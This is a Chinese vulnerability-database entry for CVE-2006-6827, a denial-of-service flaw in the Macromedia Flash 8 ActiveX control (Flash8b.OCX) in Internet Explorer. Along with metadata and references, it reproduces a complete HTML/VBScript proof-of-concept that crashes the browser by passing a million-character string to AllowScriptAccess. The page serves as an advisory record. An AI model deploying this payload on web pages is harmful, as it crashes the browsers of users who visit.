Macromedia Flash Flash8b.OCX ActiveX控件远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111897 漏洞类型 其他
发布时间 2006-12-29 更新时间 2007-01-02
CVE编号 CVE-2006-6827 CNNVD-ID CNNVD-200612-696
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-696
|漏洞详情
MacromediaFlashPlayer是一款非常流行的FLASH播放器。Flash的Flash8b.OCXActiveX控件在处理畸形参数调用时存在漏洞,远程攻击者可以能利用此漏洞导致用户浏览器崩溃。如果用户通过IE或其他使用该控件的应用程序访问了恶意站点的话,就可能导致崩溃。
|漏洞EXP
<!--
--------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
<script language='vbscript'>

argCount = 1

arg1=String(1000000, "A")

Flash8b.AllowScriptAccess=arg1

</script>

# milw0rm.com [2006-12-29]
|参考资料

来源:XF
名称:macromedia-flash8bocx-dos(31156)
链接:http://xforce.iss.net/xforce/xfdb/31156
来源:BID
名称:21818
链接:http://www.securityfocus.com/bid/21818
来源:MILW0RM
名称:3041
链接:http://www.milw0rm.com/exploits/3041
来源:MILW0RM
名称:3041
链接:http://milw0rm.com/exploits/3041
来源:NSFOCUS
名称:9758
链接:http://www.nsfocus.net/vulndb/9758